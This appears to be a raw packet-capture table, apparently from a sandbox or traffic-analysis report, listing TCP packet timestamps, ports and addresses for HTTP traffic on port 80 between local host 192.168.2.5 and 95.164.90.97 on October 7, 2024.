Oct 7, 2024 03:15:36.817248106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817255020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817279100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817287922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817297935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817312002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817326069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817329884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817343950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817346096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817361116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817385912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817404032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817418098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817420006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817441940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817457914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817461967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817482948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817487955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817498922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817512035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817523003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817528009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817543983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817548037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817563057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817586899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817589045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817608118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817611933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817629099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817637920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817641973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817670107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817677021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817687035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817703009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817715883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817728996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817738056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817744017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817759991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817774057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817812920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818641901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818695068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818696022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818726063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818742037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818773985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818779945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818825006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818830967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818876982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818883896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818926096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818942070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818957090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818972111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.818979025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.818986893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819001913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819019079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819024086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819045067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819055080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819058895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819073915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819077969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819087982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819118977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819118977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819144011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819163084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819169998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819180012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819194078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819221020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819236040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819238901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819252968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819268942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819284916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819286108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819300890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819309950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819317102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819333076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819341898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819360018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819374084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819380045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819422960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819422960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819451094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819463015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819469929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819478035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819494963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819499969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819511890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819524050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819529057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819545031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.819561005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819586039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.819612026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.839370012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839500904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839514971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839544058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839584112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.839585066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839601040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839616060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839621067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.839631081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.839644909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.839683056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.841414928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841430902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841470957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841486931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841499090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.841502905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841516972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.841519117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841536045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.841555119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.841594934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.887569904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887586117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887603045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887628078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887643099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887658119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887665033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887681961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.887788057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.887788057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.887788057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.888254881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888268948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888293028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888300896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.888309956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888339043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.888343096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888359070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888376951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888385057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.888389111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.888389111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.888433933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907299042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907345057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907358885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907418966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907452106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907448053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907468081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907483101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907500982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907620907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907620907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907620907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907620907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907656908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907704115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907717943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907732964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907757998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907792091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907807112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907810926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907823086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907840967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907860994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907864094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907880068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907918930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.907959938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907974958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.907989979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908005953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908013105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908032894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908049107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908056974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908073902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908088923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908101082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908107042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908117056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908132076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908144951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908150911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908180952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908189058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908204079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908210993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908217907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908243895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908245087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908260107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908265114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908274889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908282995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908289909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908298016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908394098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908446074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908461094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908473969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908488989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908503056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908503056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908519983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908526897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908535004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908540010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908541918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908584118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908610106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908626080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908705950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908720016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908735037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908766985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908799887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908818007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908818960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908834934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908849955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908865929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.908874989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908895016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.908910990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909620047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909632921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909648895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909665108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909678936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909698009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909724951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909742117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909759998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909763098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909776926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909806013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909837961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909852982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909868956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909883976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909899950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909904003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909914970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.909936905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.909976959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910020113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910046101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910069942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910074949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910084009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910109043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910124063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910125017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910124063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910139084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910151005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910167933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910167933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910183907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910200119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910202980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910214901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910229921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910244942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910249949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910260916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910276890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910280943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910296917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910300970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910315037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910331011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910336971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910365105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910382032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910382032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910429001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910507917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910531998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910547972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910562038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910562992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910578012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910581112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910594940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.910598993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910635948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.910666943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930453062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930488110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930541039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930572033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930577040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930597067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930610895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930644989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930676937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930679083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930699110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930715084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.930740118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930759907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.930793047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.932292938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932446957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932477951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932508945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932524920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.932543039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932569981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.932579041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932593107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.932612896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932634115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.932636023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932651997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.932668924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.932687044 CEST	49782	80	192.168.2.5	95.164.90.97
